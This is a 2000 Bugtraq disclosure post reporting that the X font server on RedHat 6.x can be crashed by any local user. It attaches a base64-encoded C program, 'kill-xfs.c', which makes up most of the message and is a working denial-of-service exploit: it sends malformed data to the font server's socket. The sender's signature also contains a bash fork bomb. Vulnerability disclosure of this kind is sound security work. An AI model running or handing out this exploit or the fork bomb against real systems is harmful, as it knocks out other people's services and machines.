Date: Sun, 16 Apr 2000 15:31:31 +0200 From: Michal Zalewski <lcamtuf@TPI.PL> Subject: xfs To: BUGTRAQ@SECURITYFOCUS.COM This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info. --8323328-15787662-955891891=:1186 Content-Type: TEXT/PLAIN; charset=US-ASCII Due to improper input validation (NULL pointer occours on strcpy()), any user may crash X fontserver under RedHat 6.x, causing effective DoS for whole X server :) _______________________________________________________ Michal Zalewski [lcamtuf@tpi.pl] [tp.internet/security] [http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};: =-----=> God is real, unless declared integer. <=-----= --8323328-15787662-955891891=:1186 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="kill-xfs.c" Content-Transfer-Encoding: BASE64 Content-ID: <Pine.LNX.4.10.10004161531310.1186@localhost> Content-Description: Content-Disposition: attachment; filename="kill-xfs.c" I2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvdW4uaD4N Cg0KI2RlZmluZSBDTlQgNTANCiNkZWZpbmUgRlMgIi90bXAvLmZvbnQtdW5p eC9mcy0xIg0KDQppbnQgcyx5Ow0Kc3RydWN0IHNvY2thZGRyX3VuIHg7DQoN CmNoYXIgYnVmW0NOVF07DQoNCm1haW4oKSB7DQogIGZvciAoeTt5PDI7eSsr KSB7DQogICAgcz1zb2NrZXQoUEZfVU5JWCxTT0NLX1NUUkVBTSwwKTsNCiAg ICB4LnN1bl9mYW1pbHk9QUZfVU5JWDsNCiAgICBzdHJjcHkoeC5zdW5fcGF0 aCxGUyk7DQogICAgaWYgKGNvbm5lY3QocywmeCxzaXplb2YoeCkpKSB7IHBl cnJvcihGUyk7IGV4aXQoMSk7IH0NCiAgICBpZiAoIXkpIHdyaXRlKHMsImxL IiwyKTsNCiAgICBtZW1zZXQoYnVmLCdBJyxDTlQpOw0KICAgIHdyaXRlKHMs YnVmLENOVCk7DQogICAgc2h1dGRvd24ocywyKTsNCiAgICBjbG9zZShzKTsN CiAgfQ0KfQ0K --8323328-15787662-955891891=:1186--